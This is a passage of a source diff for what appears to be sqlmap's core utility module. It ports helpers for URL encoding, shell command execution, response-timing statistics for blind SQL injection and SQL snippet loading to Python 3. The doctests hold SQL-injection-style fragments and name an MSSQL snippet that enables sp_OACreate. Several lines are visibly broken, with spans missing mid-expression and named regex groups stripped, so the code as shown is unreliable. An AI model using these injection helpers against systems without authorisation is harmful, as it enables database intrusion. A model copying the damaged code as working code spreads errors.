isWindowsDriveLetterPath(filepath): """ Returns True if given filepath starts with a Windows drive letter + + >>> isWindowsDriveLetterPath('C:\\boot.ini') + True + >>> isWindowsDriveLetterPath('/var/log/apache.log') + False """ - return re.search("\A[\w]\:", filepath) is not None + return re.search(r"\A[\w]\:", filepath) is not None def posixToNtSlashes(filepath): """ - Replaces all occurances of Posix slashes (/) in provided - filepath with NT ones (/) + Replaces all occurrences of Posix slashes in provided + filepath with NT backslashes >>> 
posixToNtSlashes('C:/Windows') 'C:\\\\Windows' """ - return filepath.replace('/', '\\') + return filepath.replace('/', '\\') if filepath else filepath def ntToPosixSlashes(filepath): """ - Replaces all occurances of NT slashes (\) in provided - filepath with Posix ones (/) + Replaces all occurrences of NT backslashes in provided + filepath with Posix slashes - >>> ntToPosixSlashes('C:\\Windows') + >>> ntToPosixSlashes(r'C:\\Windows') 'C:/Windows' """ - return filepath.replace('\\', '/') + return filepath.replace('\\', '/') if filepath else filepath def isHexEncodedString(subject): """ @@ -1488,9 +2350,13 @@ def isHexEncodedString(subject): return re.match(r"\A[0-9a-fA-Fx]+\Z", subject) is not None +@cachedmethod def getConsoleWidth(default=80): """ Returns console width + + >>> any((getConsoleWidth(), True)) + True """ width = None @@ -1498,11 +2364,14 @@ def getConsoleWidth(default=80): if os.getenv("COLUMNS", "").isdigit(): width = int(os.getenv("COLUMNS")) else: - output = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE).stdout.read() - items = output.split() + try: + output = shellExec("stty size") + match = re.search(r"\A\d+ (\d+)", output) - if len(items) == 2 and items[1].isdigit(): - width = int(items[1]) + if match: + width = int(match.group(1)) + except (OSError, MemoryError): + pass if width is None: try: @@ -1516,28 +2385,55 @@ def getConsoleWidth(default=80): return width or default +def shellExec(cmd): + """ + Executes arbitrary shell command + + >>> shellExec('echo 1').strip() == '1' + True + """ + + retVal = "" + + try: + retVal = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()[0] or "" + except Exception as ex: + retVal = getSafeExString(ex) + finally: + retVal = getText(retVal) + + return retVal + def clearConsoleLine(forceOutput=False): """ Clears current console line """ - if getattr(LOGGER_HANDLER, "is_tty", False): + if IS_TTY: dataToStdout("\r%s\r" % (" " * (getConsoleWidth() - 1)), forceOutput) kb.prependFlag = False - kb.stickyLevel = None def parseXmlFile(xmlFile, handler): """ Parses XML file by a given handler """ - with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream: - parse(stream, handler) + try: + with contextlib.closing(io.StringIO(readCachedFileContent(xmlFile))) as stream: + parse(stream, handler) + except (SAXParseException, UnicodeError) as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). 
Please make " % (xmlFile, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) def getSQLSnippet(dbms, sfile, **variables): """ Returns content of SQL snippet located inside 'procs/' directory + + >>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") + True """ if sfile.endswith('.sql') and os.path.exists(sfile): @@ -1550,10 +2446,10 @@ def getSQLSnippet(dbms, sfile, **variables): retVal = readCachedFileContent(filename) retVal = re.sub(r"#.+", "", retVal) - retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n") + retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n") - for _ in variables.keys(): - retVal = re.sub(r"%%%s%%" % _, variables[_], retVal) + for _ in variables: + retVal = re.sub(r"%%%s%%" % _, variables[_].replace('\\', r'\\'), retVal) for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I): retVal = retVal.replace(_, randomStr()) @@ -1561,78 +2457,78 @@ def getSQLSnippet(dbms, sfile, **variables): for _ in re.findall(r"%RANDINT\d+%", retVal, re.I): retVal = retVal.replace(_, randomInt()) - variables = re.findall(r"%(\w+)%", retVal, re.I) + variables = re.findall(r"(? 1 else "", ", ".join(variables), sfile) logger.error(errMsg) msg = "do you want to provide the substitution values? [y/N] " - choice = readInput(msg, default="N") - if choice and choice[0].lower() == "y": + if readInput(msg, default='N', boolean=True): for var in variables: msg = "insert value for variable '%s': " % var - val = readInput(msg) + val = readInput(msg, default="") retVal = retVal.replace(r"%%%s%%" % var, val) return retVal -def readCachedFileContent(filename, mode='rb'): +def readCachedFileContent(filename, mode='r'): """ Cached reading of file content (avoiding multiple same file reading) + + >>> "readCachedFileContent" in readCachedFileContent(__file__) + True """ if filename not in kb.cache.content: with kb.locks.cache: if filename not in kb.cache.content: checkFile(filename) - with codecs.open(filename, mode, UNICODE_ENCODING) as f: - kb.cache.content[filename] = f.read() + try: + with openFile(filename, mode) as f: + kb.cache.content[filename] = f.read() + except (IOError, OSError, MemoryError) as ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) return kb.cache.content[filename] -def readXmlFile(xmlFile): - """ - Reads XML file content and returns its DOM representation +def average(values): """ + Computes the arithmetic mean of a list of numbers. - checkFile(xmlFile) - retVal = minidom.parse(xmlFile).documentElement + >>> "%.1f" % average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + '0.9' + """ - return retVal + return (1.0 * sum(values) / len(values)) if values else None +@cachedmethod def stdev(values): """ Computes standard deviation of a list of numbers. - Reference: http://www.goldb.org/corestats.html + + # Reference: http://www.goldb.org/corestats.html + + >>> "%.3f" % stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + '0.063' """ if not values or len(values) < 2: return None - - key = (values[0], values[-1], len(values)) - - if key in kb.cache.stdev: - retVal = kb.cache.stdev[key] else: avg = average(values) - _ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0) - retVal = sqrt(_ / (len(values) - 1)) - kb.cache.stdev[key] = retVal - - return retVal - -def average(values): - """ - Computes the arithmetic mean of a list of numbers. 
- """ - - return (sum(values) / len(values)) if values else None + _ = 1.0 * sum(pow((_ or 0) - avg, 2) for _ in values) + return sqrt(_ / (len(values) - 1)) def calculateDeltaSeconds(start): """ Returns elapsed time from start till now + + >>> calculateDeltaSeconds(0) > 1151721660 + True """ return time.time() - start @@ -1640,13 +2536,16 @@ def calculateDeltaSeconds(start): def initCommonOutputs(): """ Initializes dictionary containing common output values used by "good samaritan" feature + + >>> initCommonOutputs(); "information_schema" in kb.commonOutputs["Databases"] + True """ kb.commonOutputs = {} key = None - with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f: - for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used + with openFile(paths.COMMON_OUTPUTS, 'r') as f: + for line in f: if line.find('#') != -1: line = line[:line.find('#')] @@ -1662,42 +2561,47 @@ def initCommonOutputs(): if line not in kb.commonOutputs[key]: kb.commonOutputs[key].add(line) -def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False): +def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False): """ Returns newline delimited items contained inside file + + >>> "SELECT" in getFileItems(paths.SQL_KEYWORDS) + True """ retVal = list() if not unique else OrderedDict() - checkFile(filename) + if filename: + filename = filename.strip('"\'') - with codecs.open(filename, 'r', UNICODE_ENCODING) if unicode_ else open(filename, 'r') as f: - for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used - if commentPrefix: - if line.find(commentPrefix) != -1: - line = line[:line.find(commentPrefix)] + checkFile(filename) - line = line.strip() + try: + with openFile(filename, 'r', errors="ignore") if unicoded else open(filename, 'r') as f: + for line in f: + if commentPrefix: + if line.find(commentPrefix) != -1: + line = line[:line.find(commentPrefix)] - if not unicode_: - try: - line = str.encode(line) - except UnicodeDecodeError: - continue + line = line.strip() - if line: - if lowercase: - line = line.lower() + if line: + if lowercase: + line = line.lower() - if unique and line in retVal: - continue + if unique and line in retVal: + continue - if unique: - retVal[line] = True - else: - retVal.append(line) + if unique: + retVal[line] = True + else: + retVal.append(line) + except (IOError, OSError, MemoryError) as ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) - return retVal if not unique else retVal.keys() + return retVal if not unique else list(retVal.keys()) def goGoodSamaritan(prevValue, originalCharset): """ @@ -1756,7 +2660,7 @@ def goGoodSamaritan(prevValue, originalCharset): # Split the original charset into common chars (commonCharset) # and other chars (otherCharset) for ordChar in originalCharset: - if chr(ordChar) not in predictionSet: + if _unichr(ordChar) not in predictionSet: otherCharset.append(ordChar) else: commonCharset.append(ordChar) @@ -1767,10 +2671,10 @@ def goGoodSamaritan(prevValue, originalCharset): else: return None, None, None, originalCharset -def getPartRun(): +def getPartRun(alias=True): """ - Goes through call stack and finds constructs matching conf.dbmsHandler.*. 
- Returns it or its alias used in txt/common-outputs.txt + Goes through call stack and finds constructs matching + conf.dbmsHandler.*. Returns it or its alias used in 'txt/common-outputs.txt' """ retVal = None @@ -1799,48 +2703,19 @@ def getPartRun(): pass # Return the INI tag to consider for common outputs (e.g. 'Databases') - return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal - -def getUnicode(value, encoding=None, system=False, noneToNull=False): - """ - Return the unicode representation of the supplied value: - - >>> getUnicode(u'test') - u'test' - >>> getUnicode('test') - u'test' - >>> getUnicode(1) - u'1' - """ - - if noneToNull and value is None: - return NULL - - if isListLike(value): - value = list(getUnicode(_, encoding, system, noneToNull) for _ in value) - return value - - if not system: - if isinstance(value, unicode): - return value - elif isinstance(value, basestring): - while True: - try: - return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING) - except UnicodeDecodeError, ex: - value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] - else: - return unicode(value) # encoding ignored for non-basestring instances + if alias: + return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal else: - try: - return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding) - except: - return getUnicode(value, UNICODE_ENCODING) + return retVal def longestCommonPrefix(*sequences): """ Returns longest common prefix occuring in given sequences - Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2 + + # Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2 + + >>> longestCommonPrefix('foobar', 'fobar') + 'fo' """ if len(sequences) == 1: @@ -1861,23 +2736,56 @@ def longestCommonPrefix(*sequences): return sequences[0] def commonFinderOnly(initial, sequence): - return longestCommonPrefix(*filter(lambda x: x.startswith(initial), sequence)) + """ + Returns parts of sequence which start with the given initial string + + >>> commonFinderOnly("abcd", ["abcdefg", "foobar", "abcde"]) + 'abcde' + """ + + return longestCommonPrefix(*[_ for _ in sequence if _.startswith(initial)]) def pushValue(value): """ Push value to the stack (thread dependent) """ - getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + exception = None + success = False + + for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT): + try: + getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + success = True + break + except Exception as ex: + exception = ex + + if not success: + getCurrentThreadData().valueStack.append(None) + + if exception: + raise exception def popValue(): """ Pop value from the stack (thread dependent) + + >>> pushValue('foobar') + >>> popValue() + 'foobar' """ - return getCurrentThreadData().valueStack.pop() + retVal = None + + try: + retVal = getCurrentThreadData().valueStack.pop() + except IndexError: + pass -def wasLastRequestDBMSError(): + return retVal + +def wasLastResponseDBMSError(): """ Returns True if the last web request resulted in a (recognized) DBMS error page """ @@ -1885,15 +2793,15 @@ def wasLastRequestDBMSError(): threadData = getCurrentThreadData() return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID -def wasLastRequestHTTPError(): +def wasLastResponseHTTPError(): """ - Returns True if 
the last web request resulted in an errornous HTTP code (like 500) + Returns True if the last web request resulted in an erroneous HTTP code (like 500) """ threadData = getCurrentThreadData() return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID -def wasLastRequestDelayed(): +def wasLastResponseDelayed(): """ Returns True if the last web request resulted in a time-delay """ @@ -1902,42 +2810,45 @@ def wasLastRequestDelayed(): # response times should be inside +-7*stdev([normal response times]) # Math reference: http://www.answers.com/topic/standard-deviation - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, [])) threadData = getCurrentThreadData() - if deviation and not conf.direct: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if deviation and not conf.direct and not conf.disableStats: + if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: warnMsg = "time-based standard deviation method used on a model " warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES - logger.warn(warnMsg) + logger.warning(warnMsg) - lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation - retVal = (threadData.lastQueryDuration >= lowerStdLimit) + lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation + retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) if not kb.testMode and retVal: if kb.adjustTimeDelay is None: msg = "do you want sqlmap to try to optimize value(s) " msg += "for DBMS delay responses (option '--time-sec')? [Y/n] " - choice = readInput(msg, default='Y') - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES + + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if not readInput(msg, default='Y', boolean=True) else ADJUST_TIME_DELAY.YES if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit) return retVal else: - return (threadData.lastQueryDuration - conf.timeSec) >= 0 + delta = threadData.lastQueryDuration - conf.timeSec + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): # MySQL's SLEEP(X) lasts 0.05 seconds shorter on average + delta += 0.05 + return delta >= 0 def adjustTimeDelay(lastQueryDuration, lowerStdLimit): """ Provides tip for adjusting time delay in time-based data retrieval """ - candidate = 1 + int(round(lowerStdLimit)) + candidate = (1 if not isHeavyQueryBased() else 2) + int(round(lowerStdLimit)) - if candidate: - kb.delayCandidates = [candidate] + kb.delayCandidates[:-1] + kb.delayCandidates = [candidate] + kb.delayCandidates[:-1] - if all((x == candidate for x in kb.delayCandidates)) and candidate < conf.timeSec: + if all((_ == candidate for _ in kb.delayCandidates)) and candidate < conf.timeSec: + if lastQueryDuration / (1.0 * conf.timeSec / candidate) > MIN_VALID_DELAYED_RESPONSE: # Note: to prevent problems with fast responses for heavy-queries like RANDOMBLOB conf.timeSec = candidate infoMsg = "adjusting time delay to " @@ -1955,90 +2866,160 @@ def getLastRequestHTTPError(): def extractErrorMessage(page): """ Returns reported error message from page if it founds one + + >>> getText(extractErrorMessage(u'Test\\nWarning: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated
<br><p>Only a test page</p></html>
') ) + 'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated' + >>> extractErrorMessage('Warning: This is only a dummy foobar test') is None + True """ retVal = None - if isinstance(page, basestring): + if isinstance(page, six.string_types): + if wasLastResponseDBMSError(): + page = re.sub(r"<[^>]+>", "", page) + for regex in ERROR_PARSING_REGEXES: - match = re.search(regex, page, re.DOTALL | re.IGNORECASE) + match = re.search(regex, page, re.IGNORECASE) if match: - retVal = htmlunescape(match.group("result")).replace("
", "\n").strip() - break + candidate = htmlUnescape(match.group("result")).replace("
", "\n").strip() + if candidate and (1.0 * len(re.findall(r"[^A-Za-z,. ]", candidate)) / len(candidate) > MIN_ERROR_PARSING_NON_WRITING_RATIO): + retVal = candidate + break + + if not retVal and wasLastResponseDBMSError(): + match = re.search(r"[^\n]*SQL[^\n:]*:[^\n]*", page, re.IGNORECASE) + + if match: + retVal = match.group(0) + + return retVal + +def findLocalPort(ports): + """ + Find the first opened localhost port from a given list of ports (e.g. for Tor port checks) + """ + + retVal = None + + for port in ports: + try: + try: + s = socket._orig_socket(socket.AF_INET, socket.SOCK_STREAM) + except AttributeError: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((LOCALHOST, port)) + retVal = port + break + except socket.error: + pass + finally: + try: + s.close() + except socket.error: + pass return retVal def findMultipartPostBoundary(post): """ Finds value for a boundary parameter in given multipart POST body + + >>> findMultipartPostBoundary("-----------------------------9051914041544843365972754266\\nContent-Disposition: form-data; name=text\\n\\ndefault") + '9051914041544843365972754266' """ retVal = None - - done = set() - candidates = [] + counts = {} for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""): - _ = match.group(1) - if _ in done: - continue - else: - candidates.append((post.count(_), _)) - done.add(_) + boundary = match.group(1).strip().strip('-') + counts[boundary] = counts.get(boundary, 0) + 1 - if candidates: - candidates.sort(key=lambda _: _[0], reverse=True) - retVal = candidates[0][1] + if counts: + sorted_boundaries = sorted(counts.items(), key=lambda x: x[1], reverse=True) + retVal = sorted_boundaries[0][0] return retVal -def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True): +def urldecode(value, encoding=None, unsafe="%%?&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, spaceplus=True): + """ + URL decodes given value + + >>> urldecode('AND%201%3E%282%2B3%29%23', convall=True) == 'AND 1>(2+3)#' + True + >>> urldecode('AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#' + True + >>> urldecode(b'AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#' + True + """ + result = value if value: - try: - # for cases like T%C3%BCrk%C3%A7e - value = str(value) - except ValueError: - pass - finally: - if convall: - result = urllib.unquote_plus(value) - else: - def _(match): - charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable) - char = chr(ord(match.group(1).decode("hex"))) - return char if char in charset else match.group(0) - result = re.sub("%([0-9a-fA-F]{2})", _, value) + value = getUnicode(value) + + if convall: + result = _urllib.parse.unquote_plus(value) if spaceplus else _urllib.parse.unquote(value) + else: + result = value + charset = set(string.printable) - set(unsafe) + + def _(match): + char = decodeHex(match.group(1), binary=False) + return char if char in charset else match.group(0) + + if spaceplus: + result = result.replace('+', ' ') # plus sign has a special meaning in URL encoded data (hence the usage of _urllib.parse.unquote_plus in convall case) - if plusspace: - result = result.replace("+", " ") # plus sign has a special meaning in url encoded data (hence the usage of urllib.unquote_plus in convall case) + result = re.sub(r"%([0-9a-fA-F]{2})", _, result or "") - if isinstance(result, str): - result = unicode(result, encoding or UNICODE_ENCODING, "replace") + result = getUnicode(result, encoding or UNICODE_ENCODING) return 
result -def urlencode(value, safe="%&=", convall=False, limit=False, spaceplus=False): - if conf.direct: +def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False): + """ + URL encodes given value + + >>> urlencode('AND 1>(2+3)#') + 'AND%201%3E%282%2B3%29%23' + >>> urlencode("AND COUNT(SELECT name FROM users WHERE name LIKE '%DBA%')>0") + 'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25DBA%25%27%29%3E0' + >>> urlencode("AND COUNT(SELECT name FROM users WHERE name LIKE '%_SYSTEM%')>0") + 'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25_SYSTEM%25%27%29%3E0' + >>> urlencode("SELECT NAME FROM TABLE WHERE VALUE LIKE '%SOME%BEGIN%'") + 'SELECT%20NAME%20FROM%20TABLE%20WHERE%20VALUE%20LIKE%20%27%25SOME%25BEGIN%25%27' + """ + + if conf.get("direct"): return value count = 0 result = None if value is None else "" if value: + value = re.sub(r"\b[$\w]+=", lambda match: match.group(0).replace('$', DOLLAR_MARKER), value) + + if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value): + warnMsg = "if you experience problems with " + warnMsg += "non-ASCII identifier names " + warnMsg += "you are advised to rerun with '--tamper=charunicodeencode'" + singleTimeWarnMessage(warnMsg) + if convall or safe is None: safe = "" # corner case when character % really needs to be - # encoded (when not representing url encoded char) + # encoded (when not representing URL encoded char) # except in cases when tampering scripts are used - if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions: - value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value) + if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions: + value = re.sub(r"(?i)\bLIKE\s+'[^']+'", lambda match: match.group(0).replace('%', "%25"), value) + value = re.sub(r"%(?![0-9a-fA-F]{2})", "%25", value) while True: - result = urllib.quote(utf8encode(value), safe) + result = _urllib.parse.quote(getBytes(value), safe) if limit and len(result) > URLENCODE_CHAR_LIMIT: if count >= len(URLENCODE_FAILSAFE_CHARS): @@ -2053,7 +3034,9 @@ def urlencode(value, safe="%&=", convall=False, limit=False, spaceplus=False): break if spaceplus: - result = result.replace(urllib.quote(' '), '+') + result = result.replace(_urllib.parse.quote(' '), '+') + + result = result.replace(DOLLAR_MARKER, '$') return result @@ -2067,11 +3050,13 @@ def runningAsAdmin(): if PLATFORM in ("posix", "mac"): _ = os.geteuid() - isAdmin = isinstance(_, (int, float, long)) and _ == 0 + isAdmin = isinstance(_, (float, six.integer_types)) and _ == 0 elif IS_WIN: + import ctypes + _ = ctypes.windll.shell32.IsUserAnAdmin() - isAdmin = isinstance(_, (int, float, long)) and _ == 1 + isAdmin = isinstance(_, (float, six.integer_types)) and _ == 1 else: errMsg = "sqlmap is not able to check if you are running it " errMsg += "as an administrator account on this platform. 
" @@ -2084,37 +3069,51 @@ def runningAsAdmin(): return isAdmin -def logHTTPTraffic(requestLogMsg, responseLogMsg): +def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None): """ Logs HTTP traffic to the output file """ - if not conf.trafficFile: - return + if conf.harFile: + conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg, startTime, endTime) - with kb.locks.log: - dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) - dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) - dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) + if conf.trafficFile: + with kb.locks.log: + dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) + dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) + dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) -def getPageTemplate(payload, place): # Cross-linked function - pass +def getPageTemplate(payload, place): # Cross-referenced function + raise NotImplementedError +@cachedmethod def getPublicTypeMembers(type_, onlyValues=False): """ Useful for getting members from types (e.g. in enums) + + >>> [_ for _ in getPublicTypeMembers(OS, True)] + ['Linux', 'Windows'] + >>> [_ for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True)] + [1, 2, 3, 4, 5, 6] """ + retVal = [] + for name, value in inspect.getmembers(type_): - if not name.startswith('__'): + if not name.startswith("__"): if not onlyValues: - yield (name, value) + retVal.append((name, value)) else: - yield value + retVal.append(value) + + return retVal def enumValueToNameLookup(type_, value_): """ Returns name of a enum member with a given value + + >>> enumValueToNameLookup(SORT_ORDER, 100) + 'LAST' """ retVal = None @@ -2126,15 +3125,24 @@ def enumValueToNameLookup(type_, value_): return retVal +@cachedmethod def extractRegexResult(regex, content, flags=0): """ Returns 'result' group value from a possible match with regex on a given content + + >>> extractRegexResult(r'a(?P[^g]+)g', 'abcdefg') + 'bcdef' + >>> extractRegexResult(r'a(?P[^g]+)g', 'ABCDEFG', re.I) + 'BCDEF' """ retVal = None - if regex and content and '?P' in regex: + if regex and content and "?P" in regex: + if isinstance(content, six.binary_type) and isinstance(regex, six.text_type): + regex = getBytes(regex) + match = re.search(regex, content, flags) if match: @@ -2145,14 +3153,27 @@ def extractRegexResult(regex, content, flags=0): def extractTextTagContent(page): """ Returns list containing content from "textual" tags + + >>> extractTextTagContent('Title
</title></head><body><pre>foobar</pre><a href="#link">
Link') + ['Title', 'foobar'] """ - page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "") - return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) + page = page or "" + + if REFLECTED_VALUE_MARKER in page: + try: + page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + except MemoryError: + page = page.replace(REFLECTED_VALUE_MARKER, "") + + return filterNone(_.group("result").strip() for _ in re.finditer(TEXT_TAG_REGEX, page)) def trimAlphaNum(value): """ Trims alpha numeric characters from start and ending of a given value + + >>> trimAlphaNum('AND 1>(2+3)-- foobar') + ' 1>(2+3)-- ' """ while value and value[-1].isalnum(): @@ -2166,14 +3187,35 @@ def trimAlphaNum(value): def isNumPosStrValue(value): """ Returns True if value is a string (or integer) with a positive integer representation + + >>> isNumPosStrValue(1) + True + >>> isNumPosStrValue('1') + True + >>> isNumPosStrValue(0) + False + >>> isNumPosStrValue('-2') + False + >>> isNumPosStrValue('100000000000000000000') + False """ - return (value and isinstance(value, basestring) and value.isdigit() and value != "0") or (isinstance(value, int) and value != 0) + retVal = False + + try: + retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT + except ValueError: + pass + + return retVal @cachedmethod def aliasToDbmsEnum(dbms): """ Returns major DBMS name from a given alias + + >>> aliasToDbmsEnum('mssql') + 'Microsoft SQL Server' """ retVal = None @@ -2190,19 +3232,26 @@ def findDynamicContent(firstPage, secondPage): """ This function checks if the provided pages have dynamic content. If they are dynamic, proper markings will be made + + >>> findDynamicContent("Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.", "Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.") + >>> kb.dynamicMarkings + [('natum reque et per. 
', 'Facer tritani repreh')] """ + if not firstPage or not secondPage: + return + infoMsg = "searching for dynamic content" - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) - blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks() + blocks = list(SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()) kb.dynamicMarkings = [] # Removing too small matching blocks for block in blocks[:]: (_, _, length) = block - if length <= DYNAMICITY_MARK_LENGTH: + if length <= 2 * DYNAMICITY_BOUNDARY_LENGTH: blocks.remove(block) # Making of dynamic markings based on prefix/suffix principle @@ -2220,14 +3269,25 @@ def findDynamicContent(firstPage, secondPage): if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)): continue - prefix = trimAlphaNum(prefix) - suffix = trimAlphaNum(suffix) + if prefix and suffix: + prefix = prefix[-DYNAMICITY_BOUNDARY_LENGTH:] + suffix = suffix[:DYNAMICITY_BOUNDARY_LENGTH] + + for _ in (firstPage, secondPage): + match = re.search(r"(?s)%s(.+)%s" % (re.escape(prefix), re.escape(suffix)), _) + if match: + infix = match.group(1) + if infix[0].isalnum(): + prefix = trimAlphaNum(prefix) + if infix[-1].isalnum(): + suffix = trimAlphaNum(suffix) + break - kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH / 2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH / 2]) if suffix else None)) + kb.dynamicMarkings.append((prefix if prefix else None, suffix if suffix else None)) if len(kb.dynamicMarkings) > 0: infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '') - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) def removeDynamicContent(page): """ @@ -2242,105 +3302,252 @@ def removeDynamicContent(page): if prefix is None and suffix is None: continue elif prefix is None: - page = re.sub(r'(?s)^.+%s' % suffix, suffix, page) + page = re.sub(r"(?s)^.+%s" % re.escape(suffix), suffix.replace('\\', r'\\'), page) elif suffix is None: - page = re.sub(r'(?s)%s.+$' % prefix, prefix, page) + page = re.sub(r"(?s)%s.+$" % re.escape(prefix), prefix.replace('\\', r'\\'), page) else: - page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page) + page = re.sub(r"(?s)%s.+%s" % (re.escape(prefix), re.escape(suffix)), "%s%s" % (prefix.replace('\\', r'\\'), suffix.replace('\\', r'\\')), page) return page -def filterStringValue(value, regex, replacement=""): +def filterStringValue(value, charRegex, replacement=""): """ Returns string value consisting only of chars satisfying supplied regular expression (note: it has to be in form [...]) + + >>> filterStringValue('wzydeadbeef0123#', r'[0-9a-f]') + 'deadbeef0123' """ retVal = value if value: - retVal = re.sub(regex.replace("[", "[^") if "[^" not in regex else regex.replace("[^", "["), replacement, value) + retVal = re.sub(charRegex.replace("[", "[^") if "[^" not in charRegex else charRegex.replace("[^", "["), replacement, value) return retVal -def filterControlChars(value): +def filterControlChars(value, replacement=' '): + """ + Returns string value with control chars being supstituted with replacement character + + >>> filterControlChars('AND 1>(2+3)\\n--') + 'AND 1>(2+3) --' + """ + + return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement) + +def filterNone(values): """ - Returns string value with control chars being supstituted with ' ' + Emulates filterNone([...]) functionality + + >>> filterNone([1, 2, "", None, 3, 0]) + [1, 2, 3, 0] """ - return 
